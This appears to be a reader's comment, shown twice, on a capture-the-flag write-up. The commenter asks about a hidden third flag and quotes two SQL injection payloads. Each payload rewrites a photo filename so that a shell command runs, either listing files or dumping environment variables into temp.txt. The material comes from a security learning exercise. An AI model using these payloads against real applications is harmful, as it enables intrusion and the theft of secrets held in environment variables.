The id 3 is actually a flag. How did you decode it? I just can't find the third flag :(
Also, how did you learn about the SQL injections performed? Mainly:
update photos set filename='* || ls ./files > temp.txt' where id=3; commit; --
and,
update photos set filename='* || env > temp.txt' where id=3; commit; --
For further actions, you may consider blocking this person and/or reporting abuse
We're a place where coders share, stay up-to-date and grow their careers.
The id 3 is actually a flag. How did you decode it? I just can't find the third flag :(
Also, how did you learn about the SQL injections performed? Mainly:
update photos set filename='* || ls ./files > temp.txt' where id=3; commit; --
and,
update photos set filename='* || env > temp.txt' where id=3; commit; --